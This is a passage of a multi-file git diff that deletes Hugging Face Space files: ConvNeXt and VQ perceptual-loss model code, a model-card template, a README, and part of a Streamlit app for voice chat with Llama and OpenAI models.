dp_rates=[x.item() for x in torch.linspace(0, drop_path_rate, sum(depths))] - cur = 0 - for i in range(4): - stage = nn.Sequential( - *[Block(dim=dims[i], drop_path=dp_rates[cur + j], - layer_scale_init_value=layer_scale_init_value) for j in range(depths[i])] - ) - self.stages.append(stage) - cur += depths[i] - - # self.norm = nn.LayerNorm(dims[-1], eps=1e-6) # final norm layer - # self.head = nn.Linear(dims[-1], num_classes) - - # self.apply(self._init_weights) - # self.head.weight.data.mul_(head_init_scale) - # self.head.bias.data.mul_(head_init_scale) - - def _init_weights(self, m): - if isinstance(m, (nn.Conv2d, nn.Linear)): - trunc_normal_(m.weight, std=.02) - nn.init.constant_(m.bias, 0) - - def forward_features(self, x): - for i in range(4): - x = self.downsample_layers[i](x) - x = self.stages[i](x) - return x - # return self.norm(x.mean([-2, -1])) # global average pooling, (N, C, H, W) -> (N, C) - - def forward(self, x): - x = self.forward_features(x) - # x = self.head(x) - return x - -class LayerNorm(nn.Module): - r""" LayerNorm that supports two data formats: channels_last (default) or channels_first. - The ordering of the dimensions in the inputs. channels_last corresponds to inputs with - shape (batch_size, height, width, channels) while channels_first corresponds to inputs - with shape (batch_size, channels, height, width). - """ - def __init__(self, normalized_shape, eps=1e-6, data_format="channels_last"): - super().__init__() - self.weight = nn.Parameter(torch.ones(normalized_shape)) - self.bias = nn.Parameter(torch.zeros(normalized_shape)) - self.eps = eps - self.data_format = data_format - if self.data_format not in ["channels_last", "channels_first"]: - raise NotImplementedError - self.normalized_shape = (normalized_shape, ) - - def forward(self, x): - if self.data_format == "channels_last": - return F.layer_norm(x, self.normalized_shape, self.weight, self.bias, self.eps) - elif self.data_format == "channels_first": - u = x.mean(1, keepdim=True) - s = (x - u).pow(2).mean(1, keepdim=True) - x = (x - u) / torch.sqrt(s + self.eps) - x = self.weight[:, None, None] * x + self.bias[:, None, None] - return x - - -model_urls = { - "convnext_tiny_1k": "https://dl.fbaipublicfiles.com/convnext/convnext_tiny_1k_224_ema.pth", - "convnext_small_1k": "https://dl.fbaipublicfiles.com/convnext/convnext_small_1k_224_ema.pth", - "convnext_base_1k": "https://dl.fbaipublicfiles.com/convnext/convnext_base_1k_224_ema.pth", - "convnext_large_1k": "https://dl.fbaipublicfiles.com/convnext/convnext_large_1k_224_ema.pth", - "convnext_tiny_22k": "https://dl.fbaipublicfiles.com/convnext/convnext_tiny_22k_224.pth", - "convnext_small_22k": "https://dl.fbaipublicfiles.com/convnext/convnext_small_22k_224.pth", - "convnext_base_22k": "https://dl.fbaipublicfiles.com/convnext/convnext_base_22k_224.pth", - "convnext_large_22k": "https://dl.fbaipublicfiles.com/convnext/convnext_large_22k_224.pth", - "convnext_xlarge_22k": "https://dl.fbaipublicfiles.com/convnext/convnext_xlarge_22k_224.pth", -} - -@register_model -def convnext_tiny(pretrained=False,in_22k=False, **kwargs): - model = ConvNeXt(depths=[3, 3, 9, 3], dims=[96, 192, 384, 768], **kwargs) - if pretrained: - url = model_urls['convnext_tiny_22k'] if in_22k else model_urls['convnext_tiny_1k'] - checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location="cpu", check_hash=True) - model.load_state_dict(checkpoint["model"], strict=False) # we remove classifer head - return model - -@register_model -def convnext_small(pretrained=False,in_22k=False, **kwargs): - model = ConvNeXt(depths=[3, 3, 27, 3], dims=[96, 192, 384, 768], **kwargs) - if pretrained: - url = model_urls['convnext_small_22k'] if in_22k else model_urls['convnext_small_1k'] - checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location="cpu") - model.load_state_dict(checkpoint["model"]) - return model - -@register_model -def convnext_base(pretrained=False, in_22k=False, **kwargs): - model = ConvNeXt(depths=[3, 3, 27, 3], dims=[128, 256, 512, 1024], **kwargs) - if pretrained: - url = model_urls['convnext_base_22k'] if in_22k else model_urls['convnext_base_1k'] - checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location="cpu") - model.load_state_dict(checkpoint["model"]) - return model - -@register_model -def convnext_large(pretrained=False, in_22k=False, **kwargs): - model = ConvNeXt(depths=[3, 3, 27, 3], dims=[192, 384, 768, 1536], **kwargs) - if pretrained: - url = model_urls['convnext_large_22k'] if in_22k else model_urls['convnext_large_1k'] - checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location="cpu") - model.load_state_dict(checkpoint["model"]) - return model - -@register_model -def convnext_xlarge(pretrained=False, in_22k=False, **kwargs): - model = ConvNeXt(depths=[3, 3, 27, 3], dims=[256, 512, 1024, 2048], **kwargs) - if pretrained: - assert in_22k, "only ImageNet-22K pre-trained ConvNeXt-XL is available; please set in_22k=True" - url = model_urls['convnext_xlarge_22k'] - checkpoint = torch.hub.load_state_dict_from_url(url=url, map_location="cpu") - model.load_state_dict(checkpoint["model"]) - return model \ No newline at end of file diff --git a/spaces/awaawawawa/iurf7irfuyytruyyugb/ldmlib/modules/losses/vqperceptual.py b/spaces/awaawawawa/iurf7irfuyytruyyugb/ldmlib/modules/losses/vqperceptual.py deleted file mode 100644 index f69981769e4bd5462600458c4fcf26620f7e4306..0000000000000000000000000000000000000000 --- a/spaces/awaawawawa/iurf7irfuyytruyyugb/ldmlib/modules/losses/vqperceptual.py +++ /dev/null @@ -1,167 +0,0 @@ -import torch -from torch import nn -import torch.nn.functional as F -from einops import repeat - -from taming.modules.discriminator.model import NLayerDiscriminator, weights_init -from taming.modules.losses.lpips import LPIPS -from taming.modules.losses.vqperceptual import hinge_d_loss, vanilla_d_loss - - -def hinge_d_loss_with_exemplar_weights(logits_real, logits_fake, weights): - assert weights.shape[0] == logits_real.shape[0] == logits_fake.shape[0] - loss_real = torch.mean(F.relu(1. - logits_real), dim=[1,2,3]) - loss_fake = torch.mean(F.relu(1. + logits_fake), dim=[1,2,3]) - loss_real = (weights * loss_real).sum() / weights.sum() - loss_fake = (weights * loss_fake).sum() / weights.sum() - d_loss = 0.5 * (loss_real + loss_fake) - return d_loss - -def adopt_weight(weight, global_step, threshold=0, value=0.): - if global_step < threshold: - weight = value - return weight - - -def measure_perplexity(predicted_indices, n_embed): - # src: https://github.com/karpathy/deep-vector-quantization/blob/main/model.py - # eval cluster perplexity. when perplexity == num_embeddings then all clusters are used exactly equally - encodings = F.one_hot(predicted_indices, n_embed).float().reshape(-1, n_embed) - avg_probs = encodings.mean(0) - perplexity = (-(avg_probs * torch.log(avg_probs + 1e-10)).sum()).exp() - cluster_use = torch.sum(avg_probs > 0) - return perplexity, cluster_use - -def l1(x, y): - return torch.abs(x-y) - - -def l2(x, y): - return torch.pow((x-y), 2) - - -class VQLPIPSWithDiscriminator(nn.Module): - def __init__(self, disc_start, codebook_weight=1.0, pixelloss_weight=1.0, - disc_num_layers=3, disc_in_channels=3, disc_factor=1.0, disc_weight=1.0, - perceptual_weight=1.0, use_actnorm=False, disc_conditional=False, - disc_ndf=64, disc_loss="hinge", n_classes=None, perceptual_loss="lpips", - pixel_loss="l1"): - super().__init__() - assert disc_loss in ["hinge", "vanilla"] - assert perceptual_loss in ["lpips", "clips", "dists"] - assert pixel_loss in ["l1", "l2"] - self.codebook_weight = codebook_weight - self.pixel_weight = pixelloss_weight - if perceptual_loss == "lpips": - print(f"{self.__class__.__name__}: Running with LPIPS.") - self.perceptual_loss = LPIPS().eval() - else: - raise ValueError(f"Unknown perceptual loss: >> {perceptual_loss} <<") - self.perceptual_weight = perceptual_weight - - if pixel_loss == "l1": - self.pixel_loss = l1 - else: - self.pixel_loss = l2 - - self.discriminator = NLayerDiscriminator(input_nc=disc_in_channels, - n_layers=disc_num_layers, - use_actnorm=use_actnorm, - ndf=disc_ndf - ).apply(weights_init) - self.discriminator_iter_start = disc_start - if disc_loss == "hinge": - self.disc_loss = hinge_d_loss - elif disc_loss == "vanilla": - self.disc_loss = vanilla_d_loss - else: - raise ValueError(f"Unknown GAN loss '{disc_loss}'.") - print(f"VQLPIPSWithDiscriminator running with {disc_loss} loss.") - self.disc_factor = disc_factor - self.discriminator_weight = disc_weight - self.disc_conditional = disc_conditional - self.n_classes = n_classes - - def calculate_adaptive_weight(self, nll_loss, g_loss, last_layer=None): - if last_layer is not None: - nll_grads = torch.autograd.grad(nll_loss, last_layer, retain_graph=True)[0] - g_grads = torch.autograd.grad(g_loss, last_layer, retain_graph=True)[0] - else: - nll_grads = torch.autograd.grad(nll_loss, self.last_layer[0], retain_graph=True)[0] - g_grads = torch.autograd.grad(g_loss, self.last_layer[0], retain_graph=True)[0] - - d_weight = torch.norm(nll_grads) / (torch.norm(g_grads) + 1e-4) - d_weight = torch.clamp(d_weight, 0.0, 1e4).detach() - d_weight = d_weight * self.discriminator_weight - return d_weight - - def forward(self, codebook_loss, inputs, reconstructions, optimizer_idx, - global_step, last_layer=None, cond=None, split="train", predicted_indices=None): - if not exists(codebook_loss): - codebook_loss = torch.tensor([0.]).to(inputs.device) - #rec_loss = torch.abs(inputs.contiguous() - reconstructions.contiguous()) - rec_loss = self.pixel_loss(inputs.contiguous(), reconstructions.contiguous()) - if self.perceptual_weight > 0: - p_loss = self.perceptual_loss(inputs.contiguous(), reconstructions.contiguous()) - rec_loss = rec_loss + self.perceptual_weight * p_loss - else: - p_loss = torch.tensor([0.0]) - - nll_loss = rec_loss - #nll_loss = torch.sum(nll_loss) / nll_loss.shape[0] - nll_loss = torch.mean(nll_loss) - - # now the GAN part - if optimizer_idx == 0: - # generator update - if cond is None: - assert not self.disc_conditional - logits_fake = self.discriminator(reconstructions.contiguous()) - else: - assert self.disc_conditional - logits_fake = self.discriminator(torch.cat((reconstructions.contiguous(), cond), dim=1)) - g_loss = -torch.mean(logits_fake) - - try: - d_weight = self.calculate_adaptive_weight(nll_loss, g_loss, last_layer=last_layer) - except RuntimeError: - assert not self.training - d_weight = torch.tensor(0.0) - - disc_factor = adopt_weight(self.disc_factor, global_step, threshold=self.discriminator_iter_start) - loss = nll_loss + d_weight * disc_factor * g_loss + self.codebook_weight * codebook_loss.mean() - - log = {"{}/total_loss".format(split): loss.clone().detach().mean(), - "{}/quant_loss".format(split): codebook_loss.detach().mean(), - "{}/nll_loss".format(split): nll_loss.detach().mean(), - "{}/rec_loss".format(split): rec_loss.detach().mean(), - "{}/p_loss".format(split): p_loss.detach().mean(), - "{}/d_weight".format(split): d_weight.detach(), - "{}/disc_factor".format(split): torch.tensor(disc_factor), - "{}/g_loss".format(split): g_loss.detach().mean(), - } - if predicted_indices is not None: - assert self.n_classes is not None - with torch.no_grad(): - perplexity, cluster_usage = measure_perplexity(predicted_indices, self.n_classes) - log[f"{split}/perplexity"] = perplexity - log[f"{split}/cluster_usage"] = cluster_usage - return loss, log - - if optimizer_idx == 1: - # second pass for discriminator update - if cond is None: - logits_real = self.discriminator(inputs.contiguous().detach()) - logits_fake = self.discriminator(reconstructions.contiguous().detach()) - else: - logits_real = self.discriminator(torch.cat((inputs.contiguous().detach(), cond), dim=1)) - logits_fake = self.discriminator(torch.cat((reconstructions.contiguous().detach(), cond), dim=1)) - - disc_factor = adopt_weight(self.disc_factor, global_step, threshold=self.discriminator_iter_start) - d_loss = disc_factor * self.disc_loss(logits_real, logits_fake) - - log = {"{}/disc_loss".format(split): d_loss.clone().detach().mean(), - "{}/logits_real".format(split): logits_real.detach().mean(), - "{}/logits_fake".format(split): logits_fake.detach().mean() - } - return d_loss, log diff --git a/spaces/awacke1/CardWriterPro/current_card.md b/spaces/awacke1/CardWriterPro/current_card.md deleted file mode 100644 index ec8fe14efadc5cca91c2dfb3833e2f0e54e124d3..0000000000000000000000000000000000000000 --- a/spaces/awacke1/CardWriterPro/current_card.md +++ /dev/null @@ -1,222 +0,0 @@ ---- -{{card_data}} ---- - -# {{ model_id }} - - Provide a quick summary of what the model is/does. - -# Table of Contents - -- [{{ model_id }}](#-model_id-) -- [Table of Contents](#table-of-contents) -- [Model Details](#model-details) - - [Model Description](#model-description) -- [Uses](#uses) - - [Direct Use](#direct-use) - - [Downstream Use [Optional]](#downstream-use-optional) - - [Out-of-Scope Use](#out-of-scope-use) -- [Bias, Risks, and Limitations](#bias-risks-and-limitations) - - [Recommendations](#recommendations) -- [Training Details](#training-details) - - [Training Data](#training-data) - - [Training Procedure](#training-procedure) - - [Preprocessing](#preprocessing) - - [Speeds, Sizes, Times](#speeds-sizes-times) -- [Evaluation](#evaluation) - - [Testing Data, Factors & Metrics](#testing-data-factors--metrics) - - [Testing Data](#testing-data) - - [Factors](#factors) - - [Metrics](#metrics) - - [Results](#results) -- [Model Examination](#model-examination) -- [Environmental Impact](#environmental-impact) -- [Technical Specifications [optional]](#technical-specifications-optional) - - [Model Architecture and Objective](#model-architecture-and-objective) - - [Compute Infrastructure](#compute-infrastructure) - - [Hardware](#hardware) - - [Software](#software) -- [Citation](#citation) -- [Glossary [optional]](#glossary-optional) -- [More Information [optional]](#more-information-optional) -- [Model Card Authors [optional]](#model-card-authors-optional) -- [Model Card Contact](#model-card-contact) -- [How to Get Started with the Model](#how-to-get-started-with-the-model) - - -# Model Details - -## Model Description - - This section provides basic information about what the model is, its current status, and where it came from.. -{{ the_model_description | default("More information needed", true)}} - -- **Developed by:** {{ developers | default("More information needed", true)}} -- **Shared by [Optional]:** {{ shared_by | default("More information needed", true)}} -- **Model type:** Language model -- **Language(s) (NLP):** {{ language | default("More information needed", true)}} -- **License:** {{ license | default("More information needed", true)}} -- **Related Models:** {{ related_models | default("More information needed", true)}} - - **Parent Model:** {{ parent_model | default("More information needed", true)}} -- **Resources for more information:** {{ more_resources | default("More information needed", true)}} - -# Uses - - Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. - -## Direct Use - - This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. - -{{ direct_use | default("More information needed", true)}} - -## Downstream Use [Optional] - - This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app - -{{ downstream_use | default("More information needed", true)}} - -## Out-of-Scope Use - - This section addresses misuse, malicious use, and uses that the model will not work well for. - -{{ out_of_scope_use | default("More information needed", true)}} - -# Bias, Risks, and Limitations - - This section is meant to convey both technical and sociotechnical limitations. - -{{ bias_risks_limitations | default("More information needed", true)}} - -## Recommendations - - This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. - -{{ bias_recommendations | default("Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recomendations.", true)}} - -# Training Details - -## Training Data - - This should link to a Data Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. - -{{ training_data | default("More information needed", true)}} - -## Training Procedure - - This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. - -### Preprocessing - -{{ preprocessing | default("More information needed", true)}} - -### Speeds, Sizes, Times - - This section provides information about throughput, start/end time, checkpoint size if relevant, etc. - -{{ speeds_sizes_times | default("More information needed", true)}} - -# Evaluation - - This section describes the evaluation protocols and provides the results. - -## Testing Data, Factors & Metrics - -### Testing Data - - This should link to a Data Card if possible. - -{{ testing_data | default("More information needed", true)}} - -### Factors - - These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. - -{{ testing_factors | default("More information needed", true)}} - -### Metrics - - These are the evaluation metrics being used, ideally with a description of why. - -{{ testing_metrics | default("More information needed", true)}} - -## Results - -{{ results | default("More information needed", true)}} - -# Model Examination - -{{ model_examination | default("More information needed", true)}} - -# Environmental Impact - - Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly - -Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - -- **Hardware Type:** {{ hardware | default("More information needed", true)}} -- **Hours used:** {{ hours_used | default("More information needed", true)}} -- **Cloud Provider:** {{ cloud_provider | default("More information needed", true)}} -- **Compute Region:** {{ cloud_region | default("More information needed", true)}} -- **Carbon Emitted:** {{ co2_emitted | default("More information needed", true)}} - -# Technical Specifications [optional] - -## Model Architecture and Objective - -{{ model_specs | default("More information needed", true)}} - -## Compute Infrastructure - -{{ compute_infrastructure | default("More information needed", true)}} - -### Hardware - -{{ hardware | default("More information needed", true)}} - -### Software - -{{ software | default("More information needed", true)}} - -# Citation - - If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. - -**BibTeX:** - -{{ citation_bibtex | default("More information needed", true)}} - -**APA:** - -{{ citation_apa | default("More information needed", true)}} - -# Glossary [optional] - - If relevant, include terms and calculations in this section that can help readers understand the model or model card. - -{{ glossary | default("More information needed", true)}} - -# More Information [optional] - -{{ more_information | default("More information needed", true)}} - -# Model Card Authors [optional] - -{{ model_card_authors | default("More information needed", true)}} - -# Model Card Contact - -{{ model_card_contact | default("More information needed", true)}} - -# How to Get Started with the Model - -Use the code below to get started with the model. - -
    - Click to expand - -{{ get_started_code | default("More information needed", true)}} - -
    - - diff --git a/spaces/awacke1/HealthConditionsTest/README.md b/spaces/awacke1/HealthConditionsTest/README.md deleted file mode 100644 index 87ae0d8c42f035539958276592bfeeeb449612c6..0000000000000000000000000000000000000000 --- a/spaces/awacke1/HealthConditionsTest/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: 👀HealthConditionsTest -emoji: 👀HC👀 -colorFrom: purple -colorTo: pink -sdk: streamlit -sdk_version: 1.17.0 -app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/awacke1/mixture-of-experts-dr-llama/backupapp.py b/spaces/awacke1/mixture-of-experts-dr-llama/backupapp.py deleted file mode 100644 index 413ce04e1cbd0f1a5980b82775afe2791422f4e8..0000000000000000000000000000000000000000 --- a/spaces/awacke1/mixture-of-experts-dr-llama/backupapp.py +++ /dev/null @@ -1,728 +0,0 @@ -# Imports -import base64 -import glob -import json -import math -import openai -import os -import pytz -import re -import requests -import streamlit as st -import textract -import time -import zipfile -import huggingface_hub -import dotenv -from audio_recorder_streamlit import audio_recorder -from bs4 import BeautifulSoup -from collections import deque -from datetime import datetime -from dotenv import load_dotenv -from huggingface_hub import InferenceClient -from io import BytesIO -from langchain.chat_models import ChatOpenAI -from langchain.chains import ConversationalRetrievalChain -from langchain.embeddings import OpenAIEmbeddings -from langchain.memory import ConversationBufferMemory -from langchain.text_splitter import CharacterTextSplitter -from langchain.vectorstores import FAISS -from openai import ChatCompletion -from PyPDF2 import PdfReader -from templates import bot_template, css, user_template -from xml.etree import ElementTree as ET -import streamlit.components.v1 as components # Import Streamlit Components for HTML5 - - -st.set_page_config(page_title="🐪Llama Whisperer🦙 Voice Chat🌟", layout="wide") - - -def add_Med_Licensing_Exam_Dataset(): - import streamlit as st - from datasets import load_dataset - dataset = load_dataset("augtoma/usmle_step_1")['test'] # Using 'test' split - st.title("USMLE Step 1 Dataset Viewer") - if len(dataset) == 0: - st.write("😢 The dataset is empty.") - else: - st.write(""" - 🔍 Use the search box to filter questions or use the grid to scroll through the dataset. - """) - - # 👩‍🔬 Search Box - search_term = st.text_input("Search for a specific question:", "") - - # 🎛 Pagination - records_per_page = 100 - num_records = len(dataset) - num_pages = max(int(num_records / records_per_page), 1) - - # Skip generating the slider if num_pages is 1 (i.e., all records fit in one page) - if num_pages > 1: - page_number = st.select_slider("Select page:", options=list(range(1, num_pages + 1))) - else: - page_number = 1 # Only one page - - # 📊 Display Data - start_idx = (page_number - 1) * records_per_page - end_idx = start_idx + records_per_page - - # 🧪 Apply the Search Filter - filtered_data = [] - for record in dataset[start_idx:end_idx]: - if isinstance(record, dict) and 'text' in record and 'id' in record: - if search_term: - if search_term.lower() in record['text'].lower(): - filtered_data.append(record) - else: - filtered_data.append(record) - - # 🌐 Render the Grid - for record in filtered_data: - st.write(f"## Question ID: {record['id']}") - st.write(f"### Question:") - st.write(f"{record['text']}") - st.write(f"### Answer:") - st.write(f"{record['answer']}") - st.write("---") - - st.write(f"😊 Total Records: {num_records} | 📄 Displaying {start_idx+1} to {min(end_idx, num_records)}") - -# 1. Constants and Top Level UI Variables - -# My Inference API Copy -# API_URL = 'https://qe55p8afio98s0u3.us-east-1.aws.endpoints.huggingface.cloud' # Dr Llama -# Original: -API_URL = "https://api-inference.huggingface.co/models/meta-llama/Llama-2-7b-chat-hf" -API_KEY = os.getenv('API_KEY') -MODEL1="meta-llama/Llama-2-7b-chat-hf" -MODEL1URL="https://huggingface.co/meta-llama/Llama-2-7b-chat-hf" -HF_KEY = os.getenv('HF_KEY') -headers = { - "Authorization": f"Bearer {HF_KEY}", - "Content-Type": "application/json" -} -key = os.getenv('OPENAI_API_KEY') -prompt = f"Write instructions to teach anyone to write a discharge plan. List the entities, features and relationships to CCDA and FHIR objects in boldface." -should_save = st.sidebar.checkbox("💾 Save", value=True, help="Save your session data.") - -# 2. Prompt label button demo for LLM -def add_witty_humor_buttons(): - with st.expander("Wit and Humor 🤣", expanded=True): - # Tip about the Dromedary family - st.markdown("🔬 **Fun Fact**: Dromedaries, part of the camel family, have a single hump and are adapted to arid environments. Their 'superpowers' include the ability to survive without water for up to 7 days, thanks to their specialized blood cells and water storage in their hump.") - - # Define button descriptions - descriptions = { - "Generate Limericks 😂": "Write ten random adult limericks based on quotes that are tweet length and make you laugh 🎭", - "Wise Quotes 🧙": "Generate ten wise quotes that are tweet length 🦉", - "Funny Rhymes 🎤": "Create ten funny rhymes that are tweet length 🎶", - "Medical Jokes 💉": "Create ten medical jokes that are tweet length 🏥", - "Minnesota Humor ❄️": "Create ten jokes about Minnesota that are tweet length 🌨️", - "Top Funny Stories 📖": "Create ten funny stories that are tweet length 📚", - "More Funny Rhymes 🎙️": "Create ten more funny rhymes that are tweet length 🎵" - } - - # Create columns - col1, col2, col3 = st.columns([1, 1, 1], gap="small") - - # Add buttons to columns - if col1.button("Generate Limericks 😂"): - StreamLLMChatResponse(descriptions["Generate Limericks 😂"]) - - if col2.button("Wise Quotes 🧙"): - StreamLLMChatResponse(descriptions["Wise Quotes 🧙"]) - - if col3.button("Funny Rhymes 🎤"): - StreamLLMChatResponse(descriptions["Funny Rhymes 🎤"]) - - col4, col5, col6 = st.columns([1, 1, 1], gap="small") - - if col4.button("Medical Jokes 💉"): - StreamLLMChatResponse(descriptions["Medical Jokes 💉"]) - - if col5.button("Minnesota Humor ❄️"): - StreamLLMChatResponse(descriptions["Minnesota Humor ❄️"]) - - if col6.button("Top Funny Stories 📖"): - StreamLLMChatResponse(descriptions["Top Funny Stories 📖"]) - - col7 = st.columns(1, gap="small") - - if col7[0].button("More Funny Rhymes 🎙️"): - StreamLLMChatResponse(descriptions["More Funny Rhymes 🎙️"]) - -def SpeechSynthesis(result): - documentHTML5=''' - - - - Read It Aloud - - - -

    🔊 Read It Aloud

    - -
    - - - - ''' - - components.html(documentHTML5, width=1280, height=1024) - #return result - - -# 3. Stream Llama Response -# @st.cache_resource -def StreamLLMChatResponse(prompt): - try: - endpoint_url = API_URL - hf_token = API_KEY - client = InferenceClient(endpoint_url, token=hf_token) - gen_kwargs = dict( - max_new_tokens=512, - top_k=30, - top_p=0.9, - temperature=0.2, - repetition_penalty=1.02, - stop_sequences=["\nUser:", "<|endoftext|>", ""], - ) - stream = client.text_generation(prompt, stream=True, details=True, **gen_kwargs) - report=[] - res_box = st.empty() - collected_chunks=[] - collected_messages=[] - allresults='' - for r in stream: - if r.token.special: - continue - if r.token.text in gen_kwargs["stop_sequences"]: - break - collected_chunks.append(r.token.text) - chunk_message = r.token.text - collected_messages.append(chunk_message) - try: - report.append(r.token.text) - if len(r.token.text) > 0: - result="".join(report).strip() - res_box.markdown(f'*{result}*') - - except: - st.write('Stream llm issue') - SpeechSynthesis(result) - return result - except: - st.write('Llama model is asleep. Starting up now on A10 - please give 5 minutes then retry as KEDA scales up from zero to activate running container(s).') - -# 4. Run query with payload -def query(payload): - response = requests.post(API_URL, headers=headers, json=payload) - st.markdown(response.json()) - return response.json() -def get_output(prompt): - return query({"inputs": prompt}) - -# 5. Auto name generated output files from time and content -def generate_filename(prompt, file_type): - central = pytz.timezone('US/Central') - safe_date_time = datetime.now(central).strftime("%m%d_%H%M") - replaced_prompt = prompt.replace(" ", "_").replace("\n", "_") - safe_prompt = "".join(x for x in replaced_prompt if x.isalnum() or x == "_")[:45] - return f"{safe_date_time}_{safe_prompt}.{file_type}" - -# 6. Speech transcription via OpenAI service -def transcribe_audio(openai_key, file_path, model): - openai.api_key = openai_key - OPENAI_API_URL = "https://api.openai.com/v1/audio/transcriptions" - headers = { - "Authorization": f"Bearer {openai_key}", - } - with open(file_path, 'rb') as f: - data = {'file': f} - response = requests.post(OPENAI_API_URL, headers=headers, files=data, data={'model': model}) - if response.status_code == 200: - st.write(response.json()) - chatResponse = chat_with_model(response.json().get('text'), '') # ************************************* - transcript = response.json().get('text') - filename = generate_filename(transcript, 'txt') - response = chatResponse - user_prompt = transcript - create_file(filename, user_prompt, response, should_save) - return transcript - else: - st.write(response.json()) - st.error("Error in API call.") - return None - -# 7. Auto stop on silence audio control for recording WAV files -def save_and_play_audio(audio_recorder): - audio_bytes = audio_recorder(key='audio_recorder') - if audio_bytes: - filename = generate_filename("Recording", "wav") - with open(filename, 'wb') as f: - f.write(audio_bytes) - st.audio(audio_bytes, format="audio/wav") - return filename - return None - -# 8. File creator that interprets type and creates output file for text, markdown and code -def create_file(filename, prompt, response, should_save=True): - if not should_save: - return - base_filename, ext = os.path.splitext(filename) - if ext in ['.txt', '.htm', '.md']: - with open(f"{base_filename}.md", 'w') as file: - try: - content = prompt.strip() + '\r\n' + response - file.write(content) - except: - st.write('.') - - #has_python_code = re.search(r"```python([\s\S]*?)```", prompt.strip() + '\r\n' + response) - #has_python_code = bool(re.search(r"```python([\s\S]*?)```", prompt.strip() + '\r\n' + response)) - #if has_python_code: - # python_code = re.findall(r"```python([\s\S]*?)```", response)[0].strip() - # with open(f"{base_filename}-Code.py", 'w') as file: - # file.write(python_code) - # with open(f"{base_filename}.md", 'w') as file: - # content = prompt.strip() + '\r\n' + response - # file.write(content) - -def truncate_document(document, length): - return document[:length] -def divide_document(document, max_length): - return [document[i:i+max_length] for i in range(0, len(document), max_length)] - -# 9. Sidebar with UI controls to review and re-run prompts and continue responses -@st.cache_resource -def get_table_download_link(file_path): - with open(file_path, 'r') as file: - data = file.read() - - b64 = base64.b64encode(data.encode()).decode() - file_name = os.path.basename(file_path) - ext = os.path.splitext(file_name)[1] # get the file extension - if ext == '.txt': - mime_type = 'text/plain' - elif ext == '.py': - mime_type = 'text/plain' - elif ext == '.xlsx': - mime_type = 'text/plain' - elif ext == '.csv': - mime_type = 'text/plain' - elif ext == '.htm': - mime_type = 'text/html' - elif ext == '.md': - mime_type = 'text/markdown' - else: - mime_type = 'application/octet-stream' # general binary data type - href = f'{file_name}' - return href - - -def CompressXML(xml_text): - root = ET.fromstring(xml_text) - for elem in list(root.iter()): - if isinstance(elem.tag, str) and 'Comment' in elem.tag: - elem.parent.remove(elem) - return ET.tostring(root, encoding='unicode', method="xml") - -# 10. Read in and provide UI for past files -@st.cache_resource -def read_file_content(file,max_length): - if file.type == "application/json": - content = json.load(file) - return str(content) - elif file.type == "text/html" or file.type == "text/htm": - content = BeautifulSoup(file, "html.parser") - return content.text - elif file.type == "application/xml" or file.type == "text/xml": - tree = ET.parse(file) - root = tree.getroot() - xml = CompressXML(ET.tostring(root, encoding='unicode')) - return xml - elif file.type == "text/markdown" or file.type == "text/md": - md = mistune.create_markdown() - content = md(file.read().decode()) - return content - elif file.type == "text/plain": - return file.getvalue().decode() - else: - return "" - -# 11. Chat with GPT - Caution on quota - now favoring fastest AI pipeline STT Whisper->LLM Llama->TTS -@st.cache_resource -def chat_with_model(prompt, document_section, model_choice='gpt-3.5-turbo'): - model = model_choice - conversation = [{'role': 'system', 'content': 'You are a helpful assistant.'}] - conversation.append({'role': 'user', 'content': prompt}) - if len(document_section)>0: - conversation.append({'role': 'assistant', 'content': document_section}) - start_time = time.time() - report = [] - res_box = st.empty() - collected_chunks = [] - collected_messages = [] - for chunk in openai.ChatCompletion.create(model='gpt-3.5-turbo', messages=conversation, temperature=0.5, stream=True): - collected_chunks.append(chunk) - chunk_message = chunk['choices'][0]['delta'] - collected_messages.append(chunk_message) - content=chunk["choices"][0].get("delta",{}).get("content") - try: - report.append(content) - if len(content) > 0: - result = "".join(report).strip() - res_box.markdown(f'*{result}*') - except: - st.write(' ') - full_reply_content = ''.join([m.get('content', '') for m in collected_messages]) - st.write("Elapsed time:") - st.write(time.time() - start_time) - return full_reply_content - -# 12. Embedding VectorDB for LLM query of documents to text to compress inputs and prompt together as Chat memory using Langchain -@st.cache_resource -def chat_with_file_contents(prompt, file_content, model_choice='gpt-3.5-turbo'): - conversation = [{'role': 'system', 'content': 'You are a helpful assistant.'}] - conversation.append({'role': 'user', 'content': prompt}) - if len(file_content)>0: - conversation.append({'role': 'assistant', 'content': file_content}) - response = openai.ChatCompletion.create(model=model_choice, messages=conversation) - return response['choices'][0]['message']['content'] - -def extract_mime_type(file): - if isinstance(file, str): - pattern = r"type='(.*?)'" - match = re.search(pattern, file) - if match: - return match.group(1) - else: - raise ValueError(f"Unable to extract MIME type from {file}") - elif isinstance(file, streamlit.UploadedFile): - return file.type - else: - raise TypeError("Input should be a string or a streamlit.UploadedFile object") - -def extract_file_extension(file): - # get the file name directly from the UploadedFile object - file_name = file.name - pattern = r".*?\.(.*?)$" - match = re.search(pattern, file_name) - if match: - return match.group(1) - else: - raise ValueError(f"Unable to extract file extension from {file_name}") - -# Normalize input as text from PDF and other formats -@st.cache_resource -def pdf2txt(docs): - text = "" - for file in docs: - file_extension = extract_file_extension(file) - st.write(f"File type extension: {file_extension}") - if file_extension.lower() in ['py', 'txt', 'html', 'htm', 'xml', 'json']: - text += file.getvalue().decode('utf-8') - elif file_extension.lower() == 'pdf': - from PyPDF2 import PdfReader - pdf = 